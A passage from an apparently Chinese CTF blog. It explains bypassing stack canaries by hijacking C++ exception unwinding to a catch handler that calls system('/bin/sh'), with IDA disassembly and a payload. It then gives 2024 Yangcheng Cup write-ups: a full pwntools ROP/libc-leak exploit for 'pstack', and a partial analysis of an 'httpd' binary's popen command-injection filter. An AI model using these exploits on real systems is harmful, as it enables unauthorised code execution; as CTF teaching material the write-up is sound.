    printf("Caught in input(): %s\n", s);
  }

  printf("input() return\n");
}

对于上面的 2 和 3 这两种情况，我分别截取了部分汇编代码供对照分析，首先是情况 2（input 中存在匹配的 catch handler）：

.text:00000000004013CE ;   try {
.text:00000000004013CE                 call    _read
.text:00000000004013D3                 mov     [rbp+var_40], rax
.text:00000000004013D7                 cmp     [rbp+var_40], 10h
.text:00000000004013DC                 jbe     short loc_401409
.text:00000000004013DE                 mov     edi, 8          ; thrown_size
.text:00000000004013E3                 call    ___cxa_allocate_exception
.text:00000000004013E8                 lea     rdx, aBufferOverflow ; "Buffer overflow detected!"
.text:00000000004013EF                 mov     [rax], rdx
.text:00000000004013F2                 mov     edx, 0          ; void (*)(void *)
.text:00000000004013F7                 mov     rcx, cs:_ZTIPKc_ptr
.text:00000000004013FE                 mov     rsi, rcx        ; lptinfo
.text:0000000000401401                 mov     rdi, rax        ; exception
.text:0000000000401404                 call    ___cxa_throw
.text:0000000000401404 ;   } // starts at 4013CE
.text:0000000000401409 ; ---------------------------------------------------------------------------
.text:0000000000401409
.text:0000000000401409 loc_401409:                             ; CODE XREF: input(void)+72↑j
.text:0000000000401409                                         ; input(void)+101↓j
.text:0000000000401409                 lea     rdi, aInputReturn ; "input() return"
.text:0000000000401410 ;   try {
.text:0000000000401410                 call    _puts
.text:0000000000401410 ;   } // starts at 401410
.text:0000000000401415                 lea     rax, [rbp+buf]
.text:0000000000401419                 mov     rdi, rax        ; this
.text:000000000040141C                 call    _ZN3fooD1Ev     ; foo::~foo()
.text:0000000000401421                 nop
.text:0000000000401422                 mov     rax, [rbp+var_18]
.text:0000000000401426                 xor     rax, fs:28h
.text:000000000040142F                 jz      short loc_40149E
.text:0000000000401431                 jmp     short loc_401499
.text:0000000000401433 ; ---------------------------------------------------------------------------
.text:0000000000401433 ;   catch(char const*) // owned by 4013CE
.text:0000000000401433                 endbr64
.text:0000000000401437                 cmp     rdx, 1
.text:000000000040143B                 jz      short loc_401442
.text:000000000040143D                 mov     rbx, rax
.text:0000000000401440                 jmp     short loc_401482
.text:0000000000401442 ; ---------------------------------------------------------------------------
.text:0000000000401442
.text:0000000000401442 loc_401442:                             ; CODE XREF: input(void)+D1↑j
.text:0000000000401442                 mov     rdi, rax        ; void *
.text:0000000000401445                 call    ___cxa_begin_catch
.text:000000000040144A                 mov     [rbp+var_38], rax
.text:000000000040144E                 mov     rax, [rbp+var_38]
.text:0000000000401452                 mov     rsi, rax
.text:0000000000401455                 lea     rdi, aCaughtInInputS ; "Caught in input(): %s\n"
.text:000000000040145C                 mov     eax, 0
.text:0000000000401461 ;   try {
.text:0000000000401461                 call    _printf
.text:0000000000401461 ;   } // starts at 401461
.text:0000000000401466                 call    ___cxa_end_catch
.text:000000000040146B                 jmp     short loc_401409
.text:000000000040146D ; ---------------------------------------------------------------------------
.text:000000000040146D ;   cleanup() // owned by 401461
.text:000000000040146D                 endbr64
.text:0000000000401471                 mov     rbx, rax
.text:0000000000401474                 call    ___cxa_end_catch
.text:0000000000401479                 jmp     short loc_401482
.text:000000000040147B ; ---------------------------------------------------------------------------
.text:000000000040147B ;   cleanup() // owned by 40139E
.text:000000000040147B ;   cleanup() // owned by 401410
.text:000000000040147B                 endbr64
.text:000000000040147F                 mov     rbx, rax
.text:0000000000401482
.text:0000000000401482 loc_401482:                             ; CODE XREF: input(void)+D6↑j
.text:0000000000401482                                         ; input(void)+10F↑j
.text:0000000000401482                 lea     rax, [rbp+buf]
.text:0000000000401486                 mov     rdi, rax        ; this
.text:0000000000401489                 call    _ZN3fooD1Ev     ; foo::~foo()
.text:000000000040148E                 mov     rax, rbx
.text:0000000000401491                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:0000000000401494                 call    __Unwind_Resume
.text:0000000000401499 ; ---------------------------------------------------------------------------
.text:0000000000401499
.text:0000000000401499 loc_401499:                             ; CODE XREF: input(void)+C7↑j
.text:0000000000401499                 call    ___stack_chk_fail
.text:000000000040149E ; ---------------------------------------------------------------------------
.text:000000000040149E
.text:000000000040149E loc_40149E:                             ; CODE XREF: input(void)+C5↑j
.text:000000000040149E                 add     rsp, 48h
.text:00000000004014A2                 pop     rbx
.text:00000000004014A3                 pop     rbp
.text:00000000004014A4                 retn
.text:00000000004014A4 ; } // starts at 40136A
.text:00000000004014A4 _Z5inputv       endp

然后是情况 3（input 中不存在匹配的 catch handler）：

.text:000000000040139E ;   try {
.text:000000000040139E                 call    _printf
.text:00000000004013A3                 mov     rax, cs:stdout_ptr
.text:00000000004013AA                 mov     rax, [rax]
.text:00000000004013AD                 mov     rdi, rax        ; stream
.text:00000000004013B0                 call    _fflush
.text:00000000004013B5                 mov     [rbp+var_3C], 100h
.text:00000000004013BC                 mov     eax, [rbp+var_3C]
.text:00000000004013BF                 movsxd  rdx, eax        ; nbytes
.text:00000000004013C2                 lea     rax, [rbp+buf]
.text:00000000004013C6                 mov     rsi, rax        ; buf
.text:00000000004013C9                 mov     edi, 0          ; fd
.text:00000000004013CE                 call    _read
.text:00000000004013D3                 mov     [rbp+var_38], rax
.text:00000000004013D7                 cmp     [rbp+var_38], 10h
.text:00000000004013DC                 jbe     short loc_401409
.text:00000000004013DE                 mov     edi, 8          ; thrown_size
.text:00000000004013E3                 call    ___cxa_allocate_exception
.text:00000000004013E8                 lea     rdx, aBufferOverflow ; "Buffer overflow detected!"
.text:00000000004013EF                 mov     [rax], rdx
.text:00000000004013F2                 mov     edx, 0          ; void (*)(void *)
.text:00000000004013F7                 mov     rcx, cs:_ZTIPKc_ptr
.text:00000000004013FE                 mov     rsi, rcx        ; lptinfo
.text:0000000000401401                 mov     rdi, rax        ; exception
.text:0000000000401404                 call    ___cxa_throw
.text:0000000000401409 ; ---------------------------------------------------------------------------
.text:0000000000401409
.text:0000000000401409 loc_401409:                             ; CODE XREF: input(void)+72↑j
.text:0000000000401409                 lea     rdi, aInputReturn ; "input() return"
.text:0000000000401410                 call    _puts
.text:0000000000401410 ;   } // starts at 40139E
.text:0000000000401415                 lea     rax, [rbp+buf]
.text:0000000000401419                 mov     rdi, rax        ; this
.text:000000000040141C                 call    _ZN3fooD1Ev     ; foo::~foo()
.text:0000000000401421                 nop
.text:0000000000401422                 mov     rax, [rbp+var_18]
.text:0000000000401426                 xor     rax, fs:28h
.text:000000000040142F                 jz      short loc_401456
.text:0000000000401431                 jmp     short loc_401451
.text:0000000000401433 ; ---------------------------------------------------------------------------
.text:0000000000401433 ;   cleanup() // owned by 40139E
.text:0000000000401433                 endbr64
.text:0000000000401437                 mov     rbx, rax
.text:000000000040143A                 lea     rax, [rbp+buf]
.text:000000000040143E                 mov     rdi, rax        ; this
.text:0000000000401441                 call    _ZN3fooD1Ev     ; foo::~foo()
.text:0000000000401446                 mov     rax, rbx
.text:0000000000401449                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:000000000040144C                 call    __Unwind_Resume
.text:0000000000401451 ; ---------------------------------------------------------------------------
.text:0000000000401451
.text:0000000000401451 loc_401451:                             ; CODE XREF: input(void)+C7↑j
.text:0000000000401451                 call    ___stack_chk_fail
.text:0000000000401456 ; ---------------------------------------------------------------------------
.text:0000000000401456
.text:0000000000401456 loc_401456:                             ; CODE XREF: input(void)+C5↑j
.text:0000000000401456                 add     rsp, 38h
.text:000000000040145A                 pop     rbx
.text:000000000040145B                 pop     rbp
.text:000000000040145C                 retn
.text:000000000040145C ; } // starts at 40136A
.text:000000000040145C _Z5inputv       endp

此时会将异常上抛到调用它的函数，也就是 main，去 main 中查找有无匹配的 catch 块：

.text:0000000000401276 ; =============== S U B R O U T I N E =======================================
.text:0000000000401276
.text:0000000000401276 ; Attributes: bp-based frame
.text:0000000000401276
.text:0000000000401276 ; int __fastcall main(int argc, const char **argv, const char **envp)
.text:0000000000401276                 public main
.text:0000000000401276 main            proc near               ; DATA XREF: _start+18↑o
.text:0000000000401276
.text:0000000000401276 var_1C          = dword ptr -1Ch
.text:0000000000401276 var_18          = qword ptr -18h
.text:0000000000401276
.text:0000000000401276 ; __unwind { // __gxx_personality_v0
.text:0000000000401276                 endbr64
.text:000000000040127A                 push    rbp
.text:000000000040127B                 mov     rbp, rsp
.text:000000000040127E                 push    rbx
.text:000000000040127F                 sub     rsp, 18h
.text:0000000000401283 ;   try {
.text:0000000000401283                 call    _Z5inputv       ; input(void)
.text:0000000000401288                 mov     edi, 4          ; thrown_size
.text:000000000040128D                 call    ___cxa_allocate_exception
.text:0000000000401292                 mov     dword ptr [rax], 1
.text:0000000000401298                 mov     edx, 0          ; void (*)(void *)
.text:000000000040129D                 mov     rcx, cs:lptinfo
.text:00000000004012A4                 mov     rsi, rcx        ; lptinfo
.text:00000000004012A7                 mov     rdi, rax        ; exception
.text:00000000004012AA                 call    ___cxa_throw
.text:00000000004012AA ;   } // starts at 401283
.text:00000000004012AF ; ---------------------------------------------------------------------------
.text:00000000004012AF
.text:00000000004012AF loc_4012AF:                             ; CODE XREF: main+8F↓j
.text:00000000004012AF                                         ; main+BA↓j
.text:00000000004012AF                 lea     rdi, s          ; "main() return"
.text:00000000004012B6                 call    _puts
.text:00000000004012BB                 mov     eax, 0
.text:00000000004012C0                 jmp     loc_401363
.text:00000000004012C5 ; ---------------------------------------------------------------------------
.text:00000000004012C5 ;   catch(int) // owned by 401283
.text:00000000004012C5 ;   catch(char const*) // owned by 401283
.text:00000000004012C5                 endbr64
.text:00000000004012C9                 cmp     rdx, 1
.text:00000000004012CD                 jz      short loc_4012DD
.text:00000000004012CF                 cmp     rdx, 2
.text:00000000004012D3                 jz      short loc_401307
.text:00000000004012D5                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:00000000004012D8                 call    __Unwind_Resume
.text:00000000004012DD ; ---------------------------------------------------------------------------
.text:00000000004012DD
.text:00000000004012DD loc_4012DD:                             ; CODE XREF: main+57↑j
.text:00000000004012DD                 mov     rdi, rax        ; void *
.text:00000000004012E0                 call    ___cxa_begin_catch
.text:00000000004012E5                 mov     eax, [rax]
.text:00000000004012E7                 mov     [rbp+var_1C], eax
.text:00000000004012EA                 mov     eax, [rbp+var_1C]
.text:00000000004012ED                 mov     esi, eax
.text:00000000004012EF                 lea     rdi, format     ; "Int: %d\n"
.text:00000000004012F6                 mov     eax, 0
.text:00000000004012FB ;   try {
.text:00000000004012FB                 call    _printf
.text:00000000004012FB ;   } // starts at 4012FB
.text:0000000000401300                 call    ___cxa_end_catch
.text:0000000000401305                 jmp     short loc_4012AF
.text:0000000000401307 ; ---------------------------------------------------------------------------
.text:0000000000401307
.text:0000000000401307 loc_401307:                             ; CODE XREF: main+5D↑j
.text:0000000000401307                 mov     rdi, rax        ; void *
.text:000000000040130A                 call    ___cxa_begin_catch
.text:000000000040130F                 mov     [rbp+var_18], rax
.text:0000000000401313                 mov     rax, [rbp+var_18]
.text:0000000000401317                 mov     rsi, rax
.text:000000000040131A                 lea     rdi, aStringS   ; "String: %s\n"
.text:0000000000401321                 mov     eax, 0
.text:0000000000401326 ;   try {
.text:0000000000401326                 call    _printf
.text:0000000000401326 ;   } // starts at 401326
.text:000000000040132B                 call    ___cxa_end_catch
.text:0000000000401330                 jmp     loc_4012AF
.text:0000000000401335 ; ---------------------------------------------------------------------------
.text:0000000000401335 ;   cleanup() // owned by 4012FB
.text:0000000000401335                 endbr64
.text:0000000000401339                 mov     rbx, rax
.text:000000000040133C                 call    ___cxa_end_catch
.text:0000000000401341                 mov     rax, rbx
.text:0000000000401344                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:0000000000401347                 call    __Unwind_Resume
.text:000000000040134C ; ---------------------------------------------------------------------------
.text:000000000040134C ;   cleanup() // owned by 401326
.text:000000000040134C                 endbr64
.text:0000000000401350                 mov     rbx, rax
.text:0000000000401353                 call    ___cxa_end_catch
.text:0000000000401358                 mov     rax, rbx
.text:000000000040135B                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:000000000040135E                 call    __Unwind_Resume
.text:0000000000401363 ; ---------------------------------------------------------------------------
.text:0000000000401363
.text:0000000000401363 loc_401363:                             ; CODE XREF: main+4A↑j
.text:0000000000401363                 add     rsp, 18h
.text:0000000000401367                 pop     rbx
.text:0000000000401368                 pop     rbp
.text:0000000000401369                 retn
.text:0000000000401369 ; } // starts at 401276
.text:0000000000401369 main            endp

所以我们发现，如果程序中途抛出了异常，那么接下来的代码一般是不会执行的，而是直接去一层层 unwind，寻找匹配的 catch handler 。

想必敏锐的你已经意识到了什么……

:::important 一般来说 canary 都是在函数即将返回的时候检测的，位于函数代码的最下面。那么，如果我们中间 throw 了异常，就不会往下执行剩余的代码，这其中就包含了 canary 的检测。即，我们无视 canary 返回到了某个 catch handler 分支。 :::

这就引出了一个问题：我们是否有办法控制它返回到任意 handler ？

不知道，调一下就清楚了。咱也不清楚 handler 是根据什么返回的，索性分别尝试覆盖 rbp 和返回地址的值看看。

首先是只覆盖了 rbp，我们发现执行 _Unwind_Resume 前 rbp 是 0x7ffe29f72c50 ◂— 0x4242424242424242 ('BBBBBBBB')：

执行完 _Unwind_Resume 后 rbp 就变成了我们写入的 B，然后继续往下执行，最终卡在了这个地方：

原因是不能解引用 rbp - 0x18 这个地址，因为它是非法地址。

不过根据我们的观察，发现这里只是用 rbp 为基地址的内存去临时存放一些东西，此处是 Buffer overflow detected! 字符串，用于 printf：

pwndbg> x/10i $rip
=> 0x40130f <main+153>: mov    QWORD PTR [rbp-0x18],rax
   0x401313 <main+157>: mov    rax,QWORD PTR [rbp-0x18]
   0x401317 <main+161>: mov    rsi,rax
   0x40131a <main+164>: lea    rdi,[rip+0xd23]        # 0x402044
   0x401321 <main+171>: mov    eax,0x0
   0x401326 <main+176>: call   0x4010e0 <printf@plt>
   0x40132b <main+181>: call   0x401160 <__cxa_end_catch@plt>
   0x401330 <main+186>: jmp    0x4012af <main+57>
   0x401335 <main+191>: endbr64
   0x401339 <main+195>: mov    rbx,rax
pwndbg> x/s 0x402044
0x402044: "String: %s\n"
pwndbg> x/s $rax
0x402063: "Buffer overflow detected!"

既然 rbp 只要是能 rw 的地址，程序又没开 PIE，那我们直接将其修改为 bss 的地址，就可以继续往下执行了：

现在我们尝试覆盖返回地址，看看会发生什么：

又是因为访问非法地址而 abort，这次是 rax，而 rax 存的是我们覆盖的返回地址。嗯……如果继续用 bss 地址代替会发生什么呢？

发现程序进入了 std::terminate()，然后输出了 terminate called after throwing an instance of 'char const*' 就 abort 了。

回想我们一开始就说的流程，「如果最后回溯完整个调用链还是没找到合适的 handler，则调用 std::terminate()，其默认行为是使程序 abort 。」所以这条输出代表它已经搜遍了所有函数的 catch 块（发生于 _Unwind_RaiseException 中），但任未找到合适的 catch handler 。那我们可以合理猜测，程序是不是根据这个返回地址值确定上哪找 catch 块呢？因为如果我们不修改这个返回地址的值的话，它的值默认是 main 中 throw 的地址，而不修改它的话程序会正常进入 main 中与之匹配的 catch handler，输出我们预期的信息：

[DEBUG] Received 0x67 bytes:
    b'foo::foo() called\n'
    b'Enter your input: foo::~foo() called\n'
    b'String: Buffer overflow detected!\n'
    b'main() return\n'

猜想有了，现在就付诸实践吧～

通过查看交叉引用，我们定位到包含 system("/bin/sh") 后门的 catch 块：

.text:000000000040145D ; =============== S U B R O U T I N E =======================================
.text:000000000040145D
.text:000000000040145D ; Attributes: bp-based frame
.text:000000000040145D
.text:000000000040145D ; int __fastcall backdoor()
.text:000000000040145D                 public _Z8backdoorv
.text:000000000040145D _Z8backdoorv    proc near
.text:000000000040145D
.text:000000000040145D var_18          = qword ptr -18h
.text:000000000040145D
.text:000000000040145D ; __unwind { // __gxx_personality_v0
.text:000000000040145D                 endbr64
.text:0000000000401461                 push    rbp
.text:0000000000401462                 mov     rbp, rsp
.text:0000000000401465                 push    rbx
.text:0000000000401466                 sub     rsp, 18h
.text:000000000040146A                 lea     rdi, aWeHaveNeverCal ; "We have never called this backdoor!"
.text:0000000000401471 ;   try {
.text:0000000000401471                 call    _puts
.text:0000000000401471 ;   } // starts at 401471
.text:0000000000401476                 jmp     short loc_4014D8
.text:0000000000401478 ; ---------------------------------------------------------------------------
.text:0000000000401478 ;   catch(char const*) // owned by 401471
.text:0000000000401478                 endbr64
.text:000000000040147C                 cmp     rdx, 1
.text:0000000000401480                 jz      short loc_40148A
.text:0000000000401482                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:0000000000401485                 call    __Unwind_Resume
.text:000000000040148A ; ---------------------------------------------------------------------------
.text:000000000040148A
.text:000000000040148A loc_40148A:                             ; CODE XREF: backdoor(void)+23↑j
.text:000000000040148A                 mov     rdi, rax        ; void *
.text:000000000040148D                 call    ___cxa_begin_catch
.text:0000000000401492                 mov     [rbp+var_18], rax
.text:0000000000401496                 mov     rax, [rbp+var_18]
.text:000000000040149A                 mov     rsi, rax
.text:000000000040149D                 lea     rdi, aBackdoorHasCat ; "Backdoor has catched the exception: %s"...
.text:00000000004014A4                 mov     eax, 0
.text:00000000004014A9 ;   try {
.text:00000000004014A9                 call    _printf
.text:00000000004014AE                 lea     rdi, command    ; "/bin/sh"
.text:00000000004014B5                 call    _system
.text:00000000004014B5 ;   } // starts at 4014A9
.text:00000000004014BA                 call    ___cxa_end_catch
.text:00000000004014BF                 jmp     short loc_4014D8
.text:00000000004014C1 ; ---------------------------------------------------------------------------
.text:00000000004014C1 ;   cleanup() // owned by 4014A9
.text:00000000004014C1                 endbr64
.text:00000000004014C5                 mov     rbx, rax
.text:00000000004014C8                 call    ___cxa_end_catch
.text:00000000004014CD                 mov     rax, rbx
.text:00000000004014D0                 mov     rdi, rax        ; struct _Unwind_Exception *
.text:00000000004014D3                 call    __Unwind_Resume
.text:00000000004014D8 ; ---------------------------------------------------------------------------
.text:00000000004014D8
.text:00000000004014D8 loc_4014D8:                             ; CODE XREF: backdoor(void)+19↑j
.text:00000000004014D8                                         ; backdoor(void)+62↑j
.text:00000000004014D8                 add     rsp, 18h
.text:00000000004014DC                 pop     rbx
.text:00000000004014DD                 pop     rbp
.text:00000000004014DE                 retn
.text:00000000004014DE ; } // starts at 40145D
.text:00000000004014DE _Z8backdoorv    endp

它的 catch 是 catch(char const*)，和我们 throw 出来的类型一样，即我们可以尝试返回到这个 catch handler 。

经过测试，我们将返回地址覆盖为后门 catch 的 try 地址加一，即 0x401471 + 0x1 就可以 get shell 。至于这个地址到底应该覆盖为什么，经测试发现它属于一个从 try 地址开始的左开又不确定区间。

最终 payload 如下：

payload = flat(
    b"A" * 0x30,
    elf.bss(),
    0x401471 + 0x1,
)
target.send(payload)

所以我们不仅无视了 canary，还成功跳转到了任意 catch handler 。不过经测试，用高版本 g++ 编译出来的程序会将 canary 检测加到 ___cxa_allocate_exception 之后，也就阻止了这种利用方式。不过这个方法在 Ubuntu 20.04 LTS 上还是可以使用的，低版本应该也没问题，所以还是值得学习的。

整明白了这个覆盖返回地址劫持 catch handler 的方法后，就可以做点实际的题目试试了，比如 2024 羊城杯的 logger 。

劫持返回地址只是 CHOP 冷兵器时代的攻击手法之一，还有其它方法，以及我们还可以控制 std::terminate() 执行任意函数，那才是 CHOP 真正的魅力之所在。~but 等我有空再继续写吧/逃~

秩序之火：任意调用与自由的幻象

TODO

References

Write-ups: 2024「羊城杯」粤港澳大湾区网络安全大赛

Mon, 22 Sep 2025 00:00:00 GMT

先挑几个简单的复现一下，因为堆都没怎么学过，就先不复现了，等以后学明白了再去研究。

pstack

Information

Category: Pwn
Points: Unknown

Description

Unknown

Write-up

看上去就是签到题，0x10 字节栈溢出，而且给了 rdi gadget，那还不简单？

~回想起我最近打的比赛，签到也基本都是栈迁移，可是没一个是有 rdi gadget 的……~

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    ROP,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
    u64,
)


FILE = "./pwn_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./libc.so.6")
rop = ROP(elf)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    read = 0x4006C4
    payload = flat(
        b"A" * 0x30,
        elf.bss() + 0x500,
        read,
        rop.rdi.address,
        elf.got["puts"],
        elf.plt["puts"],
        elf.sym["vuln"],
        b"B" * 0x10,
        0x6014D8,
        rop.leave.address,
    )
    # raw_input("DEBUG")
    target.send(payload)
    target.recvuntil(b"overflow?\x0a")
    puts = u64(target.recvline().strip().ljust(0x8, b"\x00"))
    libc.address = puts - libc.sym["puts"]
    target.success(hex(libc.address))

    payload = flat(
        b"C" * 0x30,
        elf.bss() + 0xF00,
        read,
        rop.rdi.address,
        next(libc.search(b"/bin/sh\x00")),
        libc.sym["system"],
        b"D" * 0x18,
        0x601ED8,
        rop.leave.address,
    )
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

httpd

Information

Category: Pwn
Points: Unknown

Description

Unknown

Write-up

粗略逆向分析了一下，直接全贴上来好了，反正基本就一个 main 函数：

// bad sp value at call has been detected, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int fd_1; // eax
  int fd_2; // eax
  int result; // eax
  int fd2; // eax
  int fd2_1; // eax
  struct tm *tp; // eax
  time_t tv_sec; // edi
  __off_t st_size; // esi
  const char *text_html; // eax
  struct dirent **namelist; // [esp+8h] [ebp-14134h] BYREF
  char s1_2[4]; // [esp+Ch] [ebp-14130h] BYREF
  char p_n47_1[4]; // [esp+10h] [ebp-1412Ch] BYREF
  char s1_3[4]; // [esp+14h] [ebp-14128h] BYREF
  int v16; // [esp+18h] [ebp-14124h] BYREF
  char v17; // [esp+1Ch] [ebp-14120h] BYREF
  char *haystack; // [esp+20h] [ebp-1411Ch]
  int i; // [esp+24h] [ebp-14118h]
  size_t v20; // [esp+28h] [ebp-14114h]
  char *v21; // [esp+2Ch] [ebp-14110h]
  char *v22; // [esp+30h] [ebp-1410Ch]
  int fd; // [esp+34h] [ebp-14108h]
  int fd_3; // [esp+38h] [ebp-14104h]
  FILE *stream; // [esp+3Ch] [ebp-14100h]
  int i_1; // [esp+40h] [ebp-140FCh]
  FILE *stream_1; // [esp+44h] [ebp-140F8h]
  int c; // [esp+48h] [ebp-140F4h]
  struct stat buf; // [esp+4Ch] [ebp-140F0h] BYREF
  char modes[2]; // [esp+A6h] [ebp-14096h] BYREF
  char s_3[16]; // [esp+A8h] [ebp-14094h] BYREF
  char s_2[116]; // [esp+B8h] [ebp-14084h] BYREF
  char v33[1908]; // [esp+12Ch] [ebp-14010h] BYREF
  char request[10000]; // [esp+8A0h] [ebp-1389Ch] BYREF
  char method[10000]; // [esp+2FB0h] [ebp-1118Ch] BYREF
  char path[10000]; // [esp+56C0h] [ebp-EA7Ch] BYREF
  char version[10000]; // [esp+7DD0h] [ebp-C36Ch] BYREF
  char file[20000]; // [esp+A4E0h] [ebp-9C5Ch] BYREF
  char s_1[15588]; // [esp+F300h] [ebp-4E3Ch] BYREF
  __int64 v40; // [esp+12FE4h] [ebp-1158h]
  char *v41; // [esp+12FECh] [ebp-1150h]
  int v42; // [esp+1312Ch] [ebp-1010h] BYREF
  unsigned int v43; // [esp+14120h] [ebp-1Ch]
  int *p_argc; // [esp+1412Ch] [ebp-10h]

  p_argc = &argc;
  while ( &v42 != (int *)v33 )
    ;
  v43 = __readgsdword(0x14u);
  memset(&v33[884], 0, 1024);
  v20 = 0;
  strcpy(modes, "r");
  if ( chdir("/home/ctf/html") < 0 )
    response((status *)&elf_gnu_hash_bitmask_nwords, (int)"Internal Error", 0, "Config error - couldn't chdir().");
  if ( !fgets(request, 10000, stdin) )
    response(&status_, (int)"Bad Request", 0, "No request found.");
  if ( __isoc99_sscanf(request, "%[^ ] %[^ ] %[^ ]", method, path, version) != 3 )
    response(&status_, (int)"Bad Request", 0, "Can't parse request.");
  if ( !fgets(request, 10000, stdin) )
    response(&status_, (int)"Bad Request", 0, "Missing Host.");
  v21 = strstr(request, "Host: ");
  if ( !v21 )
    response(&status_, (int)"Bad Request", 0, "Missing Host.");
  v22 = strstr(v21 + 6, "\r\n");
  if ( v22 )
  {
    *v22 = 0;
  }
  else
  {
    v22 = strchr(v21 + 6, (int)"\n");
    if ( v22 )
      *v22 = 0;
  }
  if ( strlen(v21 + 6) <= 7 )
    response(&status_, (int)"Bad Request", 0, "Host len error.");
  if ( v21 == (char *)-6 || !v21[6] )
    response(&status_, (int)"Bad Request", 0, "Host fmt error.");
  v41 = &v17;
  HIDWORD(v40) = &v16;
  __isoc99_sscanf(v21 + 6, "%d.%d.%d.%d%c", s1_2, p_n47_1, s1_3);
  if ( !fgets(request, 10000, stdin) )
    response(&status_, (int)"Bad Request", 0, "Missing Content-Length.");
  v21 = strstr(request, "Content-Length: ");
  if ( !v21 )
    response(&status_, (int)"Bad Request", 0, "Missing Content-Length.");
  v22 = strstr(v21 + 16, "\r\n");
  if ( v22 )
  {
    *v22 = 0;
  }
  else
  {
    v22 = strchr(v21 + 16, (int)"\n");
    if ( v22 )
      *v22 = 0;
  }
  if ( strlen(v21 + 16) > 5 )
    response(&status_, (int)"Bad Request", 0, "Content-Length len too long.");
  if ( strcasecmp(method, "get") )
    response(
      (status *)((char *)&elf_gnu_hash_bitmask_nwords + 1),
      (int)"Not Implemented",
      0,
      "That method is not implemented.");
  if ( strncmp(version, "HTTP/1.0", 8u) )
    response(&status_, (int)"Bad Request", 0, "Bad protocol.");
  if ( path[0] != '/' )
    response(&status_, (int)"Bad Request", 0, "Bad filename.");
  haystack = &path[1];
  sub_25DE(&path[1], &path[1]);
  if ( !*haystack )
    haystack = "./";
  v20 = strlen(haystack);
  if ( *haystack == '/'
    || !strcmp(haystack, "..")
    || !strncmp(haystack, "../", 3u)
    || strstr(haystack, "/../")
    || !strcmp(&haystack[v20 - 3], "/..") )
  {
    response(&status_, (int)"Bad Request", 0, "Illegal filename.");
  }
  if ( !check(haystack) )
    response((status *)&status_.state, (int)"Not Found", 0, "Invalid file name.");
  fd_1 = fileno(stdout);
  fd = dup(fd_1);
  fd_2 = fileno(stderr);
  fd_3 = dup(fd_2);
  freopen("/dev/null", "w", stdout);
  freopen("/dev/null", "w", stderr);
  stream = popen(haystack, modes);
  if ( stream )
  {
    pclose(stream);
    fd2 = fileno(stdout);
    dup2(fd, fd2);
    fd2_1 = fileno(stderr);
    dup2(fd_3, fd2_1);
    close(fd);
    close(fd_3);
    if ( stat(haystack, &buf) < 0 )
      response((status *)&status_.state, (int)"Not Found", 0, "File not found.");
    if ( (buf.st_mode & 0xF000) == 0x4000 )
    {
      if ( haystack[v20 - 1] != '/' )
      {
        snprintf(s_1, 0x4E20u, "Location: %s/", path);
        response((status *)((char *)&dword_12C + 2), (int)"Found", (int)s_1, "Directories must end with a slash.");
      }
      snprintf(file, 0x4E20u, "%sindex.html", haystack);
      if ( stat(file, &buf) < 0 )
      {
        sub_23D9(&status__0, "Ok", 0, (int)"text/html", -1, buf.st_mtim.tv_sec);
        i_1 = scandir(haystack, &namelist, 0, (int (*)(const void *, const void *))&alphasort);
        if ( i_1 >= 0 )
        {
          for ( i = 0; i < i_1; ++i )
          {
            sub_2704(s_2, 0x3E8u, (unsigned __int8 *)namelist[i]->d_name);
            snprintf(file, 0x4E20u, "%s/%s", haystack, namelist[i]->d_name);
            if ( lstat(file, &buf) >= 0 )
            {
              tp = localtime(&buf.st_mtim.tv_sec);
              strftime(s_3, 0x10u, "%d%b%Y %H:%M", tp);
              printf("<a href=\"%s\">%-32.32s</a>%15s %14lld\n", s_2, namelist[i]->d_name, s_3, (__int64)buf.st_size);
              sub_20C6(file);
            }
            else
            {
              printf("<a href=\"%s\">%-32.32s</a>    ???\n", s_2, namelist[i]->d_name);
            }
            printf(
              "</pre>\n<hr>\n<address><a href=\"%s\">%s</a></address>\n</body></html>\n",
              "https://2024ycb.dasctf.com/",
              "YCB2024");
          }
        }
        else
        {
          perror("scandir");
        }
        goto LABEL_74;
      }
      haystack = file;
    }
    stream_1 = fopen(haystack, "r");
    if ( !stream_1 )
      response((status *)((char *)&status_.mon_name + 3), (int)"Forbidden", 0, "File is protected.");
    tv_sec = buf.st_mtim.tv_sec;
    st_size = buf.st_size;
    text_html = sub_2566(haystack);
    sub_23D9(&status__0, "Ok", 0, (int)text_html, st_size, tv_sec);
    while ( 1 )
    {
      c = getc(stream_1);
      if ( c == -1 )
        break;
      putchar(c);
    }
LABEL_74:
    fflush(stdout);
    exit(0);
  }
  result = -1;
  if ( v43 != __readgsdword(0x14u) )
    sub_2A70();
  return result;
}

首先它得确保运行在 /home/ctf/html，所以我们先要创建这个目录，并且取保自己有访问权限。之后程序读取请求，通过 __isoc99_sscanf(request, "%[^ ] %[^ ] %[^ ]", method, path, version) != 3 将我们的请求以空格分成了 <method> <path> <version> 三部分，缺一不可。然后读取请求主机，必须是 Host: 开头，后面的 IP 也有指定格式，不符合的话就会 abort 。然后读取 Content-Length，也是类似的逻辑，没啥好说的。~吐槽一下这个实现真的是非常地 tiny 啊，Content-Length 居然是通过字符串长度来判断的，而非大小。~

之后会判断请求类型，我们发现它只实现了 GET 类型，协议版本只有 HTTP/1.0，路径必须以 / 开始。

然后是有几个路径检测，过滤掉了一些非法访问，并且做了一个简单的字符检测，过滤掉了一些非法字符：

_BOOL4 __cdecl check(char *haystack)
{
  _BOOL4 result; // eax
  char needle[3]; // [esp+15h] [ebp-13h] BYREF
  char bin[4]; // [esp+18h] [ebp-10h] BYREF
  unsigned int v4; // [esp+1Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  strcpy(needle, "sh");
  strcpy(bin, "bin");
  if ( strchr(haystack, '&') )
  {
    result = 0;
  }
  else if ( strchr(haystack, '|') )
  {
    result = 0;
  }
  else if ( strchr(haystack, ';') )
  {
    result = 0;
  }
  else if ( strchr(haystack, '$') )
  {
